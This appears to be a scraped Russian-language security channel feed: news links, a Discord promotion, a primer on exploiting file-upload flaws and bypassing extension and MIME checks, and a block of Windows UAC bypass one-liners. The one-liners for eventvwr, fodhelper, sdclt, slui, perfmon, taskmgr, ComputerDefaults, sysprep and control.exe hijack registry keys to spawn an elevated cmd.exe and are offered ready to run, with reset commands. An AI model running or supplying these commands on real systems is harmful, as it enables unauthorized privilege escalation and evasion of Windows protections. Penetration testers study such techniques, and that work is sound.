Fsecurity | HH

🔗Ссылка: https://opennet.ru/62561/

🔗Ссылка: https://github.com/husseinmuhaisen/DiscordOSINT

🔗Ссылка: https://www.securitylab.ru/news/555453.php

🔗Ссылка: https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html

Уязвимости при загрузке файлов возникают из-за небезопасной реализации функционала загрузки, особенно когда компонент выполняет слабую или вовсе не выполняет проверку загруженного файла. Критичность этого класса уязвимостей может быть разнообразной: от stored XSS до RCE. Условия для успешной эксплуатации: ❣️ Доступ к файлу: необходимо знать полный путь к файлу, чтобы обратиться к нему. ❣️ Тип контента: если сервер меняет MIME-тип файла на безопасный, выполнение кода может стать невозможным. Базовые методы эксплуатации: ❣️ Загрузка файла с вредоносным кодом, например, PHP-скрипта. ❣️ Обход client side ограничений (HTML-атрибут accept) с помощью прокси для изменения данных HTTP-запроса. Обход защитных механизмов: ❣️ Черные списки расширений: использование нестандартных расширений или манипуляция именем файла. ❣️ Белые списки расширений: использование разрешенных расширений с вредоносным содержимым. ❣️ Проверка MIME-типа: загрузка файла с корректным MIME-типом, но вредоносным содержимым. Примеры сложных атак: ❣️ Перезапись конфигурационных файлов (например, .htaccess) для изменения настроек сервера. ❣️ Использование магических байтов: изменение первых байтов файла для прохождения проверки типа. 💡 Важные советы: ❣️ Комбинируйте методы обхода для выявления слабых мест. ❣️ Учитывайте особенности технологий на стороне сервера и создавайте специализированный пэйлоад. ❣️ Не знаете, с каким списком имеете дело: черным или белым? Попробуйте загрузить файл с произвольным расширением. Если он был принят, скорее всего, используется черный список. Если загрузка отклонена, скорее всего, это строго определенный белый список. 🔗 Погрузиться подробнее 🔗 fuxploiderFuxploider сканер уязвимостей загрузки файлов и инструмент эксплуатации 🔗 Upload Scanner — сканер загрузки файлов для Burp Suite 🔗 FileUpload — расширение OWASP ZAP для поиска уязвимостей в функциональности загрузки файлов 🔗 Заметки на PayloadsAllTheThings

🔗Ссылка: https://www.securitylab.ru/news/555440.php

🔗Ссылка: https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282

🔗Ссылка: https://www.securitylab.ru/news/555423.php

🔗Ссылка: https://www.securitylab.ru/news/555428.php

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/analytics/555392.php

A repository of credential stealer formats 🧬 🔗Ссылка: https://github.com/MalBeacon/what-is-this-stealer

🔗Ссылка: https://habr.com/ru/companies/pt/articles/834486/

🔓 UAC bypass oneliners eventvwr.exe

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe

fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

sdclt.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe

slui.exe

reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe

perfmon.exe

reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe

taskmgr.exe

reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe

ComputerDefaults.exe

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe

sysprep.exe

reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe

control.exe

cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername

Сброс:

reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f

#uac #bypass #windows ✈️ Pentest HaT

🔗Ссылка: https://www.securitylab.ru/news/555344.php

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/62553/

И еще новых трендов 2025! Теперь уже с точки зрения того, на чем нужно фокусироваться. Мне такие материалы нравятся. Во-первых, ищешь пересечения между ними и анализируешь причины появления той или иной точки зрения. А во-вторых, думаешь, чему будет посвящен еще один оборот Земли вокруг Солнца в плане твоей рабочей активности. Приятно видеть, что тут ребята решили выделить в трендах безопасность кубера и resilience by design (прям подчеркну, не безопасность, а услойчивость). Так что опять, читать и вникать - обязательно. Подумать, к чему вы сейчас больше предрасположены и сфокусироваться:)

🔗Ссылка: https://www.securitylab.ru/news/555382.php?r=1

🔗Ссылка: https://www.securitylab.ru/news/555401.php